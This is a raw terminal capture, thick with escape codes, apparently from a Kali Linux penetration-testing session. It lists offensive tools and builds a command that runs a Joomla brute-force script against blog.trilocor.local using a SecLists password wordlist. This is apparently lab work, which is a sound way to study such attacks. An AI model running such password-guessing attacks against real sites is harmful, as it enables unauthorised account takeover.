cg_merge check_forensic cherryd3 cherrytree
chgrp chkdvifont chmem chmod chpasswd
chromeos-tpm-recovery cisco-decrypt clang++-15 clang++-16 cluster
cmedb colcrt colormgr colrm column comm
compress convert count-14 count-15
count-16 cp cpan cracf2john cracklib-check
cracklib-unpacker crackmapexec createdb cron cryptcat
cryptoflex-tool cupsdisable cupsenable cupstestppd curl
cvtsudoers
#[J#[30m#[104m(MORE)#[39m#[49m#[8A#[0m#[27m#[24m#[0m
#[6C#[4mc#[24m#[90md
../#[39m#[K#[133C[7:59:35]#[0m#[147D##[4mc#[39m#[4md#[24m###[24m#[32mc#[24m#[32md#[
39m
#[J#[0;1;2mcommand#[0m
#[J#[0mcd #[Jcd-create-profile #[Jcd-fix-profile #[Jcd-iccdump
#[Jcd-it8 #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m#[90m ../#[39m#[K#[133C[7:59:35]#[0m#[146D###[32mc#[32md#[32m #[39m
#[J#[A#[9C####[32mc#[32md#[39m#[39m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mchisel#[0m/ #[J#[01;34mCVE-2021-3156#[0m/
#[J#[01;34mfirefox_decrypt#[0m/ #[J#[01;34mjoomla-bruteforce#[0m/
#[J#[01;34mjoomlavs#[0m/ #[J#[01;34mLigolo-ng#[0m/ #[J#[01;34mRPCScan#[0m/
#[J#[01;34msubbrute#[0m/ #[J#[01;34mwindapsearch#[0m/
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[90m../#[39m#[K#[133C[7:59:35]#[0m#[145D#[39mj#[39m #[39m
####[4mj#[24m#[90moomlavs#[39m########[30m#[103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34mjoomla-bruteforce#[0m/ #[01;34mjoomlavs#[0m/
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103mjoomla#[39m#[49m#[3A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4mj#[24m#[90moomlavs#[39m#[K#[128C[7:59:35]#[0m#[144D##[4mj#[39m#[4mo#[24m#[30m#[
103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34mjoomla-bruteforce#[0m/ #[01;34mjoomlavs#[0m/
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103mjoomla#[39m#[49m#[3A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4mjo#[24m#[90momlavs#[39m#[K#[128C[7:59:35]#[0m#[143D##[4mo#[39m#[4mo#[24m#[30m#[
103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34mjoomla-bruteforce#[0m/ #[01;34mjoomlavs#[0m/
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103mjoomla#[39m#[49m#[3A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4mjoo#[24m#[90mmlavs#[39m#[K#[128C[7:59:35]#[0m#[142D##[4mo#[39m#[4mm#[24m#[30m#[
103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34mjoomla-bruteforce#[0m/ #[01;34mjoomlavs#[0m/
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103mjoomla#[39m#[49m#[3A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4mjoom#[24m#[90mlavs#[39m#[K#[128C[7:59:35]#[0m#[141D
#[J#[A#[13C#[39ml#[39ma#[39mv#[39ms######[4mm#[4ml#[4ma#[4m-
#[4mb#[4mruteforce#[1m#[4m/#[0m#[24m
#[J#[A#[26C
#[J#]2;cd joomla-bruteforce##]1;cd##[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/Tools/joomla-bruteforce##]1;..la-bruteforce##]7;file:///home/kali/
Tools/joomla-bruteforce#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomla-
bruteforce#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m925#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:59:38]#[148D#[?1h#=#[?
2004hl##[32ml#[39m##[32ml#[39m#[90ms#[39m##[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49
m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mlaudanum ld ldapdelete
lefty lesskey
libsixel-config light-locker line_send_tcp
linguist lion2john
llvm-cvtres-14 llvm-cvtres-15 llvm-cvtres-16
llvm-gsymutil-14 llvm-gsymutil-15
llvm-gsymutil-16 llvm-install-name-tool-14 llvm-install-name-tool-15
llvm-install-name-tool-16 llvm-jitlink-executor-14
llvm-jitlink-executor-15 llvm-jitlink-executor-16 llvm-lto-14
llvm-lto-15 llvm-lto-16
llvm-modextract-14 llvm-modextract-15 llvm-modextract-16
llvm-nm-14 llvm-nm-15
llvm-nm-16 llvm-otool-14 llvm-otool-15
llvm-otool-16 llvm-symbolizer-14
llvm-symbolizer-15 llvm-symbolizer-16 ln
lnstat localectl
locale-gen lofromtemplate login
loginctl lotus2john
lowriter lp lpmove
lp_solve ls
lsblk lspgpot lwp-dump
lwp-request lzegrep
lzless
#[J#[30m#[104m(MORE)#[39m#[49m#[14A#[0m#[27m#[24m#[0m
#[6C#[32ml#[39m#[90ms#[39m#[K#[137C[7:59:38]#[0m#[147D##[32ml#[32ms#[39m
#[J#[0;1;2mcommand#[0m
#[0mls lsa lsar lsassy lsattr lsblk lsb_release lscpu lsdiff
lsfd lsinitramfs lsipc lsirq lslocks lslogins lsmem lsmod lsmtd
#[Jlsns #[Jlsof #[Jlspci #[Jlspgpot #[Jlspower #[Jlstopo #[Jlstopo-no-
graphics #[Jlsusb #[J
#[3A#[0m#[27m#[24m#[0m
#[6C#[32mls#[39m#[K#[137C[7:59:38]#[0m#[146D#[?1l#>#[?2004l
#[J#[A#[8C
#]2;kali@kali:~/Tools/joomla-bruteforce##]1;..la-bruteforce##]7;file:///home/kali/
Tools/joomla-bruteforce#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomla-
bruteforce#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m926#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:59:41]#[148D#[?1h#=#[?
2004hs#sudo python3 joomla-brute.py -u <URL -w <password_wordlist> -usr
<username>#[75D#[7ms#[7mu#[7md#[7mo#[7m #[7mp#[7my#[7mt#[7mh#[7mo#[7mn#[7m3#[7m
#[7mj#[7mo#[7mo#[7mm#[7ml#[7ma#[7m-#[7mb#[7mr#[7mu#[7mt#[7me#[7m.#[7mp#[7my#[7m
#[7m-#[7mu#[7m #[7m<#[7mU#[7mR#[7mL#[7m #[7m-#[7mw#[7m
#[7m<#[7mp#[7ma#[7ms#[7ms#[7mw#[7mo#[7mr#[7md#[7m_#[7mw#[7mo#[7mr#[7md#[7ml#[7mi#[7
ms#[7mt#[7m>#[7m #[7m-#[7mu#[7ms#[7mr#[7m
#[7m<#[7mu#[7ms#[7me#[7mr#[7mn#[7ma#[7mm#[7me#[7m>#[27m#[75D#[27ms#[27mu#[27md#[27m
o#[27m #[27mp#[27my#[27mt#[27mh#[27mo#[27mn#[27m3#[27m
#[27mj#[27mo#[27mo#[27mm#[27ml#[27ma#[27m-
#[27mb#[27mr#[27mu#[27mt#[27me#[27m.#[27mp#[27my#[27m #[27m-#[27mu#[27m
#[27m<#[27mU#[27mR#[27mL#[27m #[27m-#[27mw#[27m
#[27m<#[27mp#[27ma#[27ms#[27ms#[27mw#[27mo#[27mr#[27md#[27m_#[27mw#[27mo#[27mr#[27m
d#[27ml#[27mi#[27ms#[27mt#[27m>#[27m #[27m-#[27mu#[27ms#[27mr#[27m
#[27m<#[27mu#[27ms#[27me#[27mr#[27mn#[27ma#[27mm#[27me#[27m>#[75D#[4m#[32ms#[4m#[32
mu#[4m#[32md#[4m#[32mo#[24m#[39m #[32mp#[32my#[32mt#[32mh#[32mo#[32mn#[32m3#[39m
#[4mj#[4mo#[4mo#[4mm#[4ml#[4ma#[4m-
#[4mb#[4mr#[4mu#[4mt#[4me#[4m.#[4mp#[4my#[24m#[4C#[33m<#[39m#[7C#[33m<#[39m#[17C#[3
3m>#[39m#[6C#[33m<#[39m#[8C#[33m>#[39m#[75D
#[0;1;2mcommand#[0m
#[J#[0msudo #[Jsudo-command-line #[Jsudoedit
#[Jsudo_logsrvd #[Jsudoreplay #[Jsudo_sendlog
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
#[33m<#[39mURL -w #[33m<#[39mpassword_wordlist#[33m>#[39m -usr
#[33m<#[39musername#[33m>#[39m#[K#[64C[7:59:41]#[0m#[148D#[5C
#[J#[0;1;2mexternal command#[0m
#[J#[0mpython3 #[Jpython3.11 #[Jpython3.11-config #[Jpython3.12 #[Jpython3.12-
config #[Jpython3-config #[Jpython3-futurize #[Jpython3-pasteurize #[Jpython3-
qr #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
#[33m<#[39mURL -w #[33m<#[39mpassword_wordlist#[33m>#[39m -usr
#[33m<#[39musername#[33m>#[39m#[K#[64C[7:59:41]#[0m#[143D#[8C
#[J#[0;1;2mfile#[0m
#[01;32mjoomla-brute.py#[0m*
#[0;1;2mPython script#[0m
#[J#[01;32mjoomla-brute.py#[0m*#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
#[33m<#[39mURL -w #[33m<#[39mpassword_wordlist#[33m>#[39m -usr
#[33m<#[39musername#[33m>#[39m#[K#[64C[7:59:41]#[0m#[135D#[7C
#[J#[0;1;2mfile#[0m
#[01;32mjoomla-brute.py#[0m*
#[0;1;2mPython script#[0m
#[J#[01;32mjoomla-brute.py#[0m*#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
#[33m<#[39mURL -w #[33m<#[39mpassword_wordlist#[33m>#[39m -usr
#[33m<#[39musername#[33m>#[39m#[K#[64C[7:59:41]#[0m#[128D#[6C
#[J#[0;1;2mfile#[0m
#[01;32mjoomla-brute.py#[0m*
#[0;1;2mPython script#[0m
#[J#[01;32mjoomla-brute.py#[0m*#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
#[33m<#[39mURL -w #[33m<#[39mpassword_wordlist#[33m>#[39m -usr
#[33m<#[39musername#[33m>#[39m#[K#[64C[7:59:41]#[0m#[122D#[4C#[3C
#[J#[0;1;2mfile#[0m
#[J#[01;32mjoomla-brute.py#[0m* #[JREADME.md #[Jtest.py
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
#[33m<#[39mURL -w #[33m<#[39mpassword_wordlist#[33m>#[39m -usr
#[33m<#[39musername#[33m>#[39m#[K#[64C[7:59:41]#[0m#[115D#[1C
#[J#[0;1;2mfile#[0m
#[J#[01;32mjoomla-brute.py#[0m* #[JREADME.md #[Jtest.py
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
#[33m<#[39m -w #[33m<#[39mpassword_wordlist#[33m>#[39m -usr
#[33m<#[39musername#[33m>#[39m#[K#[67C[7:59:41]#[0m#[115D##[39m -w
#[33m<#[39m#[39mpassword_wordlist#[33m>#[39m#[39m -usr
#[33m<#[39m#[39musername#[33m>#[39m#[39m #[40D
#[J#[0;1;2mfile#[0m
#[J#[01;32mjoomla-brute.py#[0m* #[JREADME.md #[Jtest.py
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u -w
#[33m<#[39mpassword_wordlist#[33m>#[39m -usr
#[33m<#[39musername#[33m>#[39m#[K#[68C[7:59:41]#[0m#[116Db -w#[39m
#[33m<#[39mpassword_wordlis#[39mt#[33m>#[39m -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[39Dl -w#[39m
#[33m<#[39mpassword_wordlis#[39mt#[33m>#[39m -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[39Do -w#[39m
#[33m<#[39mpassword_wordlis#[39mt#[33m>#[39m -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[39Dg -w#[39m
#[33m<#[39mpassword_wordlis#[39mt#[33m>#[39m -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[39D. -w#[39m
#[33m<#[39mpassword_wordlis#[39mt#[33m>#[39m -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[39Dt -w#[39m
#[33m<#[39mpassword_wordlis#[39mt#[33m>#[39m -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[39Dr -w#[39m
#[33m<#[39mpassword_wordlis#[39mt#[33m>#[39m -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[39Di -w#[39m
#[33m<#[39mpassword_wordlis#[39mt#[33m>#[39m -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[39Dl -w#[39m
#[33m<#[39mpassword_wordlis#[39mt#[33m>#[39m -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[39Do -w#[39m
#[33m<#[39mpassword_wordlis#[39mt#[33m>#[39m -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[39Dc -w#[39m
#[33m<#[39mpassword_wordlis#[39mt#[33m>#[39m -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[39Do -w#[39m
#[33m<#[39mpassword_wordlis#[39mt#[33m>#[39m -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[39D
#[J#[0;1;2mfile#[0m
#[J#[0mtest.py#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[33m<#[39mpassword_wordlist#[33m>#[39m -usr
#[33m<#[39musername#[33m>#[39m#[K#[49C[7:59:41]#[0m#[74D#[9D -usr
#[33m<#[39mu#[39msername#[33m>#[39m #[39m #[25D#[9D -usr
#[33m<#[39musername#[33m>#[39m #[39m #[25D
#[J#[0;1;2mfile#[0m
#[J#[01;32mjoomla-brute.py#[0m* #[JREADME.md #[Jtest.py
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[33m<#[39m -usr
#[33m<#[39musername#[33m>#[39m#[K#[67C[7:59:41]#[0m#[92D##[39m -usr
#[33m<#[39m#[39musername#[33m>#[39m#[39m #[17D
#[J#[0;1;2mfile#[0m
#[J#[01;32mjoomla-brute.py#[0m* #[JREADME.md #[Jtest.py
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w -usr
#[33m<#[39musername#[33m>#[39m#[K#[68C[7:59:41]#[0m#[93D/ -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16D##[4m/#[24m
#[J#[0;1;2mdirectory#[0m
#[01;36mbin#[0m@ #[01;34mboot#[0m/ #[01;34mdev#[0m/
#[01;34metc#[0m/ #[01;34mhome#[0m/ #[01;36mlib#[0m@
#[01;36mlib32#[0m@ #[01;36mlib64#[0m@ #[01;34mlost+found#[0m/
#[01;34mmedia#[0m/ #[01;34mmnt#[0m/
#[01;34mopt#[0m/ #[01;34mproc#[0m/ #[01;34mroot#[0m/
#[01;34mrun#[0m/ #[01;36msbin#[0m@ #[01;34msrv#[0m/
#[01;34msys#[0m/ #[30;42mtmp#[0m/ #[01;34musr#[0m/
#[01;34mvar#[0m/
#[0;1;2mfile#[0m
#[J#[01;36minitrd.img#[0m@ #[J#[01;36minitrd.img.old#[0m@
#[J#[01;36mvmlinuz#[0m@ #[J#[01;36mvmlinuz.old#[0m@
#[J#[5A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/#[24m -usr
#[33m<#[39musername#[33m>#[39m#[K#[67C[7:59:41]#[0m#[92D##[4m/#[4mu#[24m -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16D###[24m/#[24mus -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34musr#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w /us -usr
#[33m<#[39musername#[33m>#[39m#[K#[65C[7:59:41]#[0m#[90Dr -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16D#####[4m/#[4mu#[4ms#[4mr#[24m##[4mr#[4m/
#[24m -usr#[39m #[33m<#[39musernam#[39me#[33m>#[39m#[16D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mbin#[0m/ #[J#[01;34mgames#[0m/ #[J#[01;34mi686-w64-mingw32#[0m/
#[J#[01;34minclude#[0m/ #[J#[01;34mlib#[0m/ #[J#[01;34mlib32#[0m/
#[J#[01;34mlib64#[0m/ #[J#[01;34mlibexec#[0m/ #[J#[01;34mlocal#[0m/
#[J#[01;34msbin#[0m/ #[J#[01;34mshare#[0m/ #[J#[01;34msrc#[0m/
#[J#[01;34mx86_64-w64-mingw32#[0m/ #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/#[24m -usr
#[33m<#[39musername#[33m>#[39m#[K#[63C[7:59:41]#[0m#[88D##[4m/#[4ms#[24m -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16D#######[24m/#[24mu#[24ms#[24mr#[24m/#[24msh
-usr#[39m #[33m<#[39musernam#[39me#[33m>#[39m#[16Da -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mshare#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w /usr/sha -usr
#[33m<#[39musername#[33m>#[39m#[K#[60C[7:59:41]#[0m#[85Dr -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16De -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16D#[10D#[4m/#[4mu#[4ms#[4mr#[4m/
#[4ms#[4mh#[4ma#[4mr#[4me#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mshare#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share#[24m -usr
#[33m<#[39musername#[33m>#[39m#[K#[58C[7:59:41]#[0m#[83D##[4me#[4m/#[24m -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#
[30m#[104m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34maccounts#[0m/ #[01;34maccountsservice#[0m/
#[01;34maclocal#[0m/ #[01;34malsa#[0m/ #[01;34malsa-card-
profile#[0m/ #[01;34mamass#[0m/ #[01;34mant#[0m/
#[01;34mapache2#[0m/
#[01;34mapparmor-features#[0m/ #[01;34mapplication-registry#[0m/
#[01;34mapplications#[0m/ #[01;34mapport#[0m/ #[01;34mapps#[0m/
#[01;34mappstream#[0m/ #[01;34mapt-file#[0m/ #[01;34marp-scan#[0m/
#[01;34maspell#[0m/ #[01;34matril#[0m/
#[01;34mautopsy#[0m/ #[01;34mavahi#[0m/ #[01;34mawk#[0m/
#[01;34mbackgrounds#[0m/ #[01;34mbase-files#[0m/ #[01;34mbase-passwd#[0m/
#[01;34mbash-completion#[0m/ #[01;34mbinfmts#[0m/
#[01;34mbluedevilwizard#[0m/ #[01;34mblueman#[0m/ #[01;34mbug#[0m/
#[01;34mbuild-essential#[0m/ #[01;34mburpsuite#[0m/ #[01;34mca-
certificates#[0m/
#[01;34mca-certificates-java#[0m/ #[01;34mcaja#[0m/
#[01;34mcatdoc#[0m/ #[01;34mcatfish#[0m/ #[01;34mcffi-
wheels#[0m/ #[01;34mcherrytree#[0m/ #[01;34mchromium#[0m/
#[01;34mcmake#[0m/
#[01;34mcolor#[0m/ #[01;34mcolord#[0m/
#[01;34mcolor-schemes#[0m/ #[01;34mcommand-not-found#[0m/ #[01;34mcommix#[0m/
#[01;34mcommon-licenses#[0m/ #[01;34mconfig.kcfg#[0m/ #[01;34mconsolefonts#[0m/
#[01;34mconsole-setup#[0m/ #[01;34mconsoletrans#[0m/
#[01;34mcontractor#[0m/ #[01;34mcreddump7#[0m/ #[01;34mcrunch#[0m/
#[01;34mcryptsetup#[0m/ #[01;34mcups#[0m/ #[01;34mdavtest#[0m/
#[J#[30m#[104m(MORE)#[39m#[49m#[9A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/#[24m -usr
#[33m<#[39musername#[33m>#[39m#[K#[57C[7:59:41]#[0m#[82D##[4m/#[4ms#[24m -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16D#[12D#[24m/#[24mu#[24ms#[24mr#[24m/
#[24ms#[24mh#[24ma#[24mr#[24me#[24m/#[24mse -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mseclists#[0m/ #[J#[01;34msensible-utils#[0m/ #[J#[01;34mset#[0m/
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w /usr/share/se -usr
#[33m<#[39musername#[33m>#[39m#[K#[55C[7:59:41]#[0m#[80Dc -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16D
#[J#[A#[75C#[14D#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/
#[4ms#[4me#[4mc#[4ml#[4mi#[4ms#[4mt#[4ms#[1m#[4m/#[0m#[24m#[39m -usr
#[33m<#[39mus#[39mername#[33m>#[39m#[16D
#[J#[0;1;2mdirectory#[0m
#[01;34mDiscovery#[0m/ #[01;34mFuzzing#[0m/ #[01;34mIOCs#[0m/
#[01;34mMiscellaneous#[0m/ #[01;34mPasswords#[0m/ #[01;34mPattern-
Matching#[0m/ #[01;34mPayloads#[0m/ #[01;34mUsernames#[0m/ #[01;34mWeb-
Shells#[0m/
#[0;1;2mfile#[0m
#[J#[0mREADME.md#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists#[1m#[4m/#[0m#[24m -usr
#[33m<#[39musername#[33m>#[39m#[K#[48C[7:59:41]#[0m#[73D##[1m#[4m/
#[1m#[4mP#[0m#[24m -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16D#[21D#[24m/#[24mu#[24ms#[24mr#[24m/
#[24ms#[24mh#[24ma#[24mr#[24me#[24m/
#[24ms#[24me#[24mc#[24ml#[24mi#[24ms#[24mt#[24ms#[0m#[24m/
#[0m#[24mP#[30m#[103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34mPasswords#[0m/ #[01;34mPattern-Matching#[0m/ #[01;34mPayloads#[0m/
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103m/usr/share/seclists/Pa#[39m#[49m#[3A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w /usr/share/seclists/P -usr
#[33m<#[39musername#[33m>#[39m#[K#[47C[7:59:41]#[0m#[72Da -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16Ds -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16Ds -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mPasswords#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w /usr/share/seclists/Pass -usr
#[33m<#[39musername#[33m>#[39m#[K#[44C[7:59:41]#[0m#[69D
#[J#[A#[85C#[24D#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/
#[4ms#[4me#[4mc#[4ml#[4mi#[4ms#[4mt#[4ms#[4m/
#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[1m#[4m/#[0m#[24m#[39m -usr
#[33m<#[39mus#[39mername#[33m>#[39m#[16D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#
[30m#[104m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34mBiblePass#[0m/ #[01;34mBooks#[0m/ #[01;34mCommon-
Credentials#[0m/ #[01;34mCracked-Hashes#[0m/ #[01;34mDefault-
Credentials#[0m/ #[01;34mHoneypot-Captures#[0m/ #[01;34mKeyboard-Walks#[0m/
#[01;34mLeaked-Databases#[0m/ #[01;34mMalware#[0m/
#[01;34mPermutations#[0m/ #[01;34mphp-hashes#[0m/
#[01;34mSoftware#[0m/ #[01;34mWiFi-WPA#[0m/
#[01;34mWikipedia#[0m/
#[0;1;2mfile#[0m
#[0m2020-200_most_used_passwords.txt 2023-200_most_used_passwords.txt 500-
worst-passwords.txt #[01;31m500-worst-passwords.txt.bz2#[0m bt4-
password.txt
cirt-default-passwords.txt citrix.txt clarkson-
university-82.txt common_corporate_passwords.lst darkc0de.txt
darkweb2017-top10000.txt darkweb2017-top1000.txt
darkweb2017-top100.txt darkweb2017-top10.txt days.txt
der-postillon.txt dutch_common_wordlist.txt
dutch_passwordlist.txt dutch_wordlist german_misc.txt
months.txt Most-Popular-Letter-Passes.txt
#[J#[30m#[104m(MORE)#[39m#[49m#[10A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords#[1m#[4m/#[0m#[24m -usr
#[33m<#[39musername#[33m>#[39m#[K#[38C[7:59:41]#[0m#[63D##[1m#[4m/
#[1m#[4m5#[0m#[24m -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16D#[31D#[24m/#[24mu#[24ms#[24mr#[24m/
#[24ms#[24mh#[24ma#[24mr#[24me#[24m/
#[24ms#[24me#[24mc#[24ml#[24mi#[24ms#[24mt#[24ms#[24m/
#[24mP#[24ma#[24ms#[24ms#[24mw#[24mo#[24mr#[24md#[24ms#[0m#[24m/
#[0m#[24m5#[30m#[103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mfile#[0m
#[0m500-worst-passwords.txt #[01;31m500-worst-passwords.txt.bz2#[0m
#[J#[0;2m#[1mcommon substring:#[0m #[30m#[103m/usr/share/seclists/Passwords/500-
worst-passwords.txt#[39m#[49m#[3A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w /usr/share/seclists/Passwords/5 -usr
#[33m<#[39musername#[33m>#[39m#[K#[37C[7:59:41]#[0m#[62D0 -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16D0 -usr#[39m
#[33m<#[39musernam#[39me#[33m>#[39m#[16D
#[J#[A#[94C#[30m#[103m#[39m#[49m#[33D#[4m/#[4mu#[4ms#[4mr#[4m/
#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4ms#[4mt#[4ms#[4m/
#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/#[4m5#[4m0#[4m0#[4m-
#[4mw#[4mo#[4mr#[4ms#[4mt#[39m#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[39m#[4ms#[4m.txt#[24m -usr
#[33m<#[39musername#[33m>#[39m#[16D
#[J#[0;1;2mfile#[0m
